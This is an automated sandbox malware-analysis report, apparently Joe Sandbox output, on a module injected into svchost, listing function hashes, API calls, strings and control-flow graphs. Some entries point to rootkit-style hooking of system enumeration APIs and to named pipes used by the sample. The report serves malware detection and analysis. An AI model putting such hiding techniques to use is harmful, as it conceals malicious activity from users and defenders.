                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 489a7c68e5e93f2be97043befc8e533eee2d989b9a1ceb06d858f03c7cbb19f7
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 59311DB620AB858AEB609F61E8907ED7365F784744F48442ADB4E97BA4EF3CC548C710
                                                        Function 000001FB539CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 6fdd1fba7bf15b503d1394c2c4db13ffaa122b827706bd4a70a70ebbee7c2285
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: 29319376219F8586EB60CF25E8813EE73A1F789754F580125EA9E43B64DF3CC545CB00
                                                        Function 000001FB539C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: e0d383892e9437e16feb1cfbd0bccaab8c6993bef60af1a4249abde3c73bbe4e
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: CF5160B6209B8686EB54CF62E4853AA77A2F789FC9F484534DE8A47728DF3CC045C700
                                                        Function 000001FB539C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 6fe1454f222dbdc956f5aa37bac40278d1ba15de22a72ebfa92ae51e802ad3c4
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 1D314DF410AA4BA0FA04EF66E8D26F4A322AB44348F8C5433948B027769F7C8249D350
                                                        Function 000001FB53996910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 197 1fb53996910-1fb53996916 198 1fb53996918-1fb5399691b 197->198 199 1fb53996951-1fb5399695b 197->199 201 1fb53996945-1fb53996984 call 1fb53996fc0 198->201 202 1fb5399691d-1fb53996920 198->202 200 1fb53996a78-1fb53996a8d 199->200 206 1fb53996a9c-1fb53996ab6 call 1fb53996e54 200->206 207 1fb53996a8f 200->207 219 1fb5399698a-1fb5399699f call 1fb53996e54 201->219 220 1fb53996a52 201->220 204 1fb53996938 __scrt_dllmain_crt_thread_attach 202->204 205 1fb53996922-1fb53996925 202->205 208 1fb5399693d-1fb53996944 204->208 210 1fb53996927-1fb53996930 205->210 211 1fb53996931-1fb53996936 call 1fb53996f04 205->211 217 1fb53996ab8-1fb53996aed call 1fb53996f7c call 1fb53996e1c call 1fb53997318 call 1fb53997130 call 1fb53997154 call 1fb53996fac 206->217 218 1fb53996aef-1fb53996b20 call 1fb53997190 206->218 212 1fb53996a91-1fb53996a9b 207->212 211->208 217->212 229 1fb53996b22-1fb53996b28 218->229 230 1fb53996b31-1fb53996b37 218->230 232 1fb539969a5-1fb539969b6 call 1fb53996ec4 219->232 233 1fb53996a6a-1fb53996a77 call 1fb53997190 219->233 223 1fb53996a54-1fb53996a69 220->223 229->230 234 1fb53996b2a-1fb53996b2c 229->234 235 1fb53996b39-1fb53996b43 230->235 236 1fb53996b7e-1fb53996b94 call 1fb5399268c 230->236 250 1fb539969b8-1fb539969dc call 1fb539972dc call 1fb53996e0c call 1fb53996e38 call 1fb5399ac0c 232->250 251 1fb53996a07-1fb53996a11 call 1fb53997130 232->251 233->200 240 1fb53996c1f-1fb53996c2c 234->240 241 1fb53996b45-1fb53996b4d 235->241 242 1fb53996b4f-1fb53996b5d call 1fb539a5780 235->242 258 1fb53996b96-1fb53996b98 236->258 259 1fb53996bcc-1fb53996bce 236->259 247 1fb53996b63-1fb53996b78 call 1fb53996910 241->247 242->247 262 1fb53996c15-1fb53996c1d 242->262 247->236 247->262 250->251 300 1fb539969de-1fb539969e5 __scrt_dllmain_after_initialize_c 250->300 251->220 272 1fb53996a13-1fb53996a1f call 1fb53997180 251->272 258->259 267 1fb53996b9a-1fb53996bbc call 1fb5399268c call 1fb53996a78 258->267 260 1fb53996bd5-1fb53996bea call 1fb53996910 259->260 261 1fb53996bd0-1fb53996bd3 259->261 260->262 281 1fb53996bec-1fb53996bf6 260->281 261->260 261->262 262->240 267->259 293 1fb53996bbe-1fb53996bc6 call 1fb539a5780 267->293 289 1fb53996a45-1fb53996a50 272->289 290 1fb53996a21-1fb53996a2b call 1fb53997098 272->290 286 1fb53996bf8-1fb53996bff 281->286 287 1fb53996c01-1fb53996c11 call 1fb539a5780 281->287 286->262 287->262 289->223 290->289 299 1fb53996a2d-1fb53996a3b 290->299 293->259 299->289 300->251 301 1fb539969e7-1fb53996a04 call 1fb5399abc8 300->301 301->251
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: f6a05610631161f0791a0f46ca97f481bc5ebb53e9b00542c7e35bf7c6f5f54b
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: A3817EF370F28786FA509B65D4E13F96392A7857A0F5C4135AA47477B6EB3CC8458B00
                                                        Function 000001FB539CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 304 1fb539cce28-1fb539cce4a GetLastError 305 1fb539cce69-1fb539cce74 FlsSetValue 304->305 306 1fb539cce4c-1fb539cce57 FlsGetValue 304->306 309 1fb539cce76-1fb539cce79 305->309 310 1fb539cce7b-1fb539cce80 305->310 307 1fb539cce59-1fb539cce61 306->307 308 1fb539cce63 306->308 311 1fb539cced5-1fb539ccee0 SetLastError 307->311 308->305 309->311 312 1fb539cce85 call 1fb539cd6cc 310->312 313 1fb539ccef5-1fb539ccf0b call 1fb539cc748 311->313 314 1fb539ccee2-1fb539ccef4 311->314 315 1fb539cce8a-1fb539cce96 312->315 328 1fb539ccf28-1fb539ccf33 FlsSetValue 313->328 329 1fb539ccf0d-1fb539ccf18 FlsGetValue 313->329 317 1fb539ccea8-1fb539cceb2 FlsSetValue 315->317 318 1fb539cce98-1fb539cce9f FlsSetValue 315->318 320 1fb539cceb4-1fb539ccec4 FlsSetValue 317->320 321 1fb539ccec6-1fb539cced0 call 1fb539ccb94 call 1fb539cd744 317->321 319 1fb539ccea1-1fb539ccea6 call 1fb539cd744 318->319 319->309 320->319 321->311 332 1fb539ccf98-1fb539ccf9f call 1fb539cc748 328->332 333 1fb539ccf35-1fb539ccf3a 328->333 330 1fb539ccf1a-1fb539ccf1e 329->330 331 1fb539ccf22 329->331 330->332 335 1fb539ccf20 330->335 331->328 337 1fb539ccf3f call 1fb539cd6cc 333->337 338 1fb539ccf8f-1fb539ccf97 335->338 340 1fb539ccf44-1fb539ccf50 337->340 341 1fb539ccf62-1fb539ccf6c FlsSetValue 340->341 342 1fb539ccf52-1fb539ccf59 FlsSetValue 340->342 344 1fb539ccf80-1fb539ccf8a call 1fb539ccb94 call 1fb539cd744 341->344 345 1fb539ccf6e-1fb539ccf7e FlsSetValue 341->345 343 1fb539ccf5b-1fb539ccf60 call 1fb539cd744 342->343 343->332 344->338 345->343
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001FB539CCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEBC
                                                        • SetLastError.KERNEL32 ref: 000001FB539CCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001FB539CECCC,?,?,?,?,000001FB539CBF9F,?,?,?,?,?,000001FB539C7AB0), ref: 000001FB539CCF2C
                                                          • Part of subcall function 000001FB539CD6CC: HeapAlloc.KERNEL32 ref: 000001FB539CD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF54
                                                          • Part of subcall function 000001FB539CD744: HeapFree.KERNEL32 ref: 000001FB539CD75A
                                                          • Part of subcall function 000001FB539CD744: GetLastError.KERNEL32 ref: 000001FB539CD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF76
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: 6d41343913785b7a6c2472a831a74eef6234c9dfd0991a1be6bdcb384e67cf70
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: C8412BF020B24F42FA68A725D6D63F927435B857B0F5C0734A9374A7FADB2C98029A50
                                                        Function 000001FB539C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 03d7399eea3254e19b5d8266f2eebc46fa5138ef8e7893cb31c7892e277a4139
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: C721567661974583FB10CB25F4853A977A2F789B94F584625DA9A03BB8CF3CC145CB00
                                                        Function 000001FB53999944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 449 1fb53999944-1fb539999ac call 1fb5399a814 452 1fb53999e13-1fb53999e1b call 1fb5399bb48 449->452 453 1fb539999b2-1fb539999b5 449->453 453->452 454 1fb539999bb-1fb539999c1 453->454 456 1fb539999c7-1fb539999cb 454->456 457 1fb53999a90-1fb53999aa2 454->457 456->457 461 1fb539999d1-1fb539999dc 456->461 459 1fb53999d63-1fb53999d67 457->459 460 1fb53999aa8-1fb53999aac 457->460 462 1fb53999d69-1fb53999d70 459->462 463 1fb53999da0-1fb53999daa call 1fb53998a34 459->463 460->459 464 1fb53999ab2-1fb53999abd 460->464 461->457 465 1fb539999e2-1fb539999e7 461->465 462->452 466 1fb53999d76-1fb53999d9b call 1fb53999e1c 462->466 463->452 476 1fb53999dac-1fb53999dcb call 1fb53996d40 463->476 464->459 468 1fb53999ac3-1fb53999aca 464->468 465->457 469 1fb539999ed-1fb539999f7 call 1fb53998a34 465->469 466->463 472 1fb53999c94-1fb53999ca0 468->472 473 1fb53999ad0-1fb53999b07 call 1fb53998e10 468->473 469->476 480 1fb539999fd-1fb53999a28 call 1fb53998a34 * 2 call 1fb53999124 469->480 472->463 477 1fb53999ca6-1fb53999caa 472->477 473->472 485 1fb53999b0d-1fb53999b15 473->485 482 1fb53999cba-1fb53999cc2 477->482 483 1fb53999cac-1fb53999cb8 call 1fb539990e4 477->483 517 1fb53999a48-1fb53999a52 call 1fb53998a34 480->517 518 1fb53999a2a-1fb53999a2e 480->518 482->463 484 1fb53999cc8-1fb53999cd5 call 1fb53998cb4 482->484 483->482 497 1fb53999cdb-1fb53999ce3 483->497 484->463 484->497 490 1fb53999b19-1fb53999b4b 485->490 494 1fb53999c87-1fb53999c8e 490->494 495 1fb53999b51-1fb53999b5c 490->495 494->472 494->490 495->494 498 1fb53999b62-1fb53999b7b 495->498 499 1fb53999df6-1fb53999e12 call 1fb53998a34 * 2 call 1fb5399baa8 497->499 500 1fb53999ce9-1fb53999ced 497->500 502 1fb53999c74-1fb53999c79 498->502 503 1fb53999b81-1fb53999bc6 call 1fb539990f8 * 2 498->503 499->452 504 1fb53999d00 500->504 505 1fb53999cef-1fb53999cfe call 1fb539990e4 500->505 508 1fb53999c84 502->508 530 1fb53999c04-1fb53999c0a 503->530 531 1fb53999bc8-1fb53999bee call 1fb539990f8 call 1fb5399a038 503->531 513 1fb53999d03-1fb53999d0d call 1fb5399a8ac 504->513 505->513 508->494 513->463 528 1fb53999d13-1fb53999d61 call 1fb53998d44 call 1fb53998f50 513->528 517->457 534 1fb53999a54-1fb53999a74 call 1fb53998a34 * 2 call 1fb5399a8ac 517->534 518->517 522 1fb53999a30-1fb53999a3b 518->522 522->517 527 1fb53999a3d-1fb53999a42 522->527 527->452 527->517 528->463 535 1fb53999c0c-1fb53999c10 530->535 536 1fb53999c7b 530->536 550 1fb53999c15-1fb53999c72 call 1fb53999870 531->550 551 1fb53999bf0-1fb53999c02 531->551 555 1fb53999a76-1fb53999a80 call 1fb5399a99c 534->555 556 1fb53999a8b 534->556 535->503 541 1fb53999c80 536->541 541->508 550->541 551->530 551->531 559 1fb53999a86-1fb53999def call 1fb539986ac call 1fb5399a3f4 call 1fb539988a0 555->559 560 1fb53999df0-1fb53999df5 call 1fb5399baa8 555->560 556->457 559->560 560->499
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797512847.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb53990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: fa9bbf22c5165d2bb50162e04197a4c728e4534f610685b807383e084df18b8a
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 5FE1A2B360A7428AFB60DF65D4D03ED77A6F749798F180125EE4A57BA5DB38C091CB00
                                                        Function 000001FB539CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 570 1fb539ca544-1fb539ca5ac call 1fb539cb414 573 1fb539caa13-1fb539caa1b call 1fb539cc748 570->573 574 1fb539ca5b2-1fb539ca5b5 570->574 574->573 575 1fb539ca5bb-1fb539ca5c1 574->575 577 1fb539ca5c7-1fb539ca5cb 575->577 578 1fb539ca690-1fb539ca6a2 575->578 577->578 582 1fb539ca5d1-1fb539ca5dc 577->582 580 1fb539ca6a8-1fb539ca6ac 578->580 581 1fb539ca963-1fb539ca967 578->581 580->581 583 1fb539ca6b2-1fb539ca6bd 580->583 585 1fb539ca969-1fb539ca970 581->585 586 1fb539ca9a0-1fb539ca9aa call 1fb539c9634 581->586 582->578 584 1fb539ca5e2-1fb539ca5e7 582->584 583->581 587 1fb539ca6c3-1fb539ca6ca 583->587 584->578 588 1fb539ca5ed-1fb539ca5f7 call 1fb539c9634 584->588 585->573 589 1fb539ca976-1fb539ca99b call 1fb539caa1c 585->589 586->573 599 1fb539ca9ac-1fb539ca9cb call 1fb539c7940 586->599 591 1fb539ca894-1fb539ca8a0 587->591 592 1fb539ca6d0-1fb539ca707 call 1fb539c9a10 587->592 588->599 603 1fb539ca5fd-1fb539ca628 call 1fb539c9634 * 2 call 1fb539c9d24 588->603 589->586 591->586 596 1fb539ca8a6-1fb539ca8aa 591->596 592->591 608 1fb539ca70d-1fb539ca715 592->608 600 1fb539ca8ba-1fb539ca8c2 596->600 601 1fb539ca8ac-1fb539ca8b8 call 1fb539c9ce4 596->601 600->586 607 1fb539ca8c8-1fb539ca8d5 call 1fb539c98b4 600->607 601->600 614 1fb539ca8db-1fb539ca8e3 601->614 639 1fb539ca648-1fb539ca652 call 1fb539c9634 603->639 640 1fb539ca62a-1fb539ca62e 603->640 607->586 607->614 612 1fb539ca719-1fb539ca74b 608->612 616 1fb539ca887-1fb539ca88e 612->616 617 1fb539ca751-1fb539ca75c 612->617 619 1fb539ca8e9-1fb539ca8ed 614->619 620 1fb539ca9f6-1fb539caa12 call 1fb539c9634 * 2 call 1fb539cc6a8 614->620 616->591 616->612 617->616 621 1fb539ca762-1fb539ca77b 617->621 623 1fb539ca8ef-1fb539ca8fe call 1fb539c9ce4 619->623 624 1fb539ca900 619->624 620->573 625 1fb539ca874-1fb539ca879 621->625 626 1fb539ca781-1fb539ca7c6 call 1fb539c9cf8 * 2 621->626 634 1fb539ca903-1fb539ca90d call 1fb539cb4ac 623->634 624->634 630 1fb539ca884 625->630 651 1fb539ca7c8-1fb539ca7ee call 1fb539c9cf8 call 1fb539cac38 626->651 652 1fb539ca804-1fb539ca80a 626->652 630->616 634->586 648 1fb539ca913-1fb539ca961 call 1fb539c9944 call 1fb539c9b50 634->648 639->578 655 1fb539ca654-1fb539ca674 call 1fb539c9634 * 2 call 1fb539cb4ac 639->655 640->639 645 1fb539ca630-1fb539ca63b 640->645 645->639 647 1fb539ca63d-1fb539ca642 645->647 647->573 647->639 648->586 670 1fb539ca815-1fb539ca872 call 1fb539ca470 651->670 671 1fb539ca7f0-1fb539ca802 651->671 659 1fb539ca87b 652->659 660 1fb539ca80c-1fb539ca810 652->660 676 1fb539ca676-1fb539ca680 call 1fb539cb59c 655->676 677 1fb539ca68b 655->677 664 1fb539ca880 659->664 660->626 664->630 670->664 671->651 671->652 680 1fb539ca686-1fb539ca9ef call 1fb539c92ac call 1fb539caff4 call 1fb539c94a0 676->680 681 1fb539ca9f0-1fb539ca9f5 call 1fb539cc6a8 676->681 677->578 680->681 681->620
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 338b81fb1fb998c2e9a63077ae0a77f9f53bcbf061a28ddd9ec4cac16e89678f
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 73E1D5B261A74A8AEB20DF25D4C13ED77A2F745B98F0C0125EE8A57BA5CB3CC581C701
                                                        Function 000001FB539CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 691 1fb539cf394-1fb539cf3e6 692 1fb539cf4d7 691->692 693 1fb539cf3ec-1fb539cf3ef 691->693 696 1fb539cf4d9-1fb539cf4f5 692->696 694 1fb539cf3f9-1fb539cf3fc 693->694 695 1fb539cf3f1-1fb539cf3f4 693->695 697 1fb539cf402-1fb539cf411 694->697 698 1fb539cf4bc-1fb539cf4cf 694->698 695->696 699 1fb539cf413-1fb539cf416 697->699 700 1fb539cf421-1fb539cf440 LoadLibraryExW 697->700 698->692 701 1fb539cf516-1fb539cf525 GetProcAddress 699->701 702 1fb539cf41c 699->702 703 1fb539cf4f6-1fb539cf50b 700->703 704 1fb539cf446-1fb539cf44f GetLastError 700->704 707 1fb539cf527-1fb539cf54e 701->707 708 1fb539cf4b5 701->708 705 1fb539cf4a8-1fb539cf4af 702->705 703->701 706 1fb539cf50d-1fb539cf510 FreeLibrary 703->706 709 1fb539cf496-1fb539cf4a0 704->709 710 1fb539cf451-1fb539cf468 call 1fb539cc928 704->710 705->697 705->708 706->701 707->696 708->698 709->705 710->709 713 1fb539cf46a-1fb539cf47e call 1fb539cc928 710->713 713->709 716 1fb539cf480-1fb539cf494 LoadLibraryExW 713->716 716->703 716->709
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 4aa6df102775c91470a30eaca5d58870190ca1f5ab6b237e14a952d32f0ac0da
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 2F41F1B231FA4681FA16CB16E8843F52393BB49BA0F4D45399D0B877A4EF3CC4458360
                                                        Function 000001FB539C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 717 1fb539c104c-1fb539c10b9 RegQueryInfoKeyW 718 1fb539c11b5-1fb539c11d0 717->718 719 1fb539c10bf-1fb539c10c9 717->719 719->718 720 1fb539c10cf-1fb539c111f RegEnumValueW 719->720 721 1fb539c11a5-1fb539c11af 720->721 722 1fb539c1125-1fb539c112a 720->722 721->718 721->720 722->721 723 1fb539c112c-1fb539c1135 722->723 724 1fb539c1147-1fb539c114c 723->724 725 1fb539c1137 723->725 727 1fb539c1199-1fb539c11a3 724->727 728 1fb539c114e-1fb539c1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 724->728 726 1fb539c113b-1fb539c113f 725->726 726->721 729 1fb539c1141-1fb539c1145 726->729 727->721 728->727 729->724 729->726
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: cd5e0a5dff588b072592f6f5fec2fbd5c03b9c3fd72847433edc5f87d93d953f
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 2C416273219B85C6E760CF61E4847AF77A2F389B98F488125DA8A47768DF3CC545CB40
                                                        Function 000001FB539CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0F0
                                                        Strings
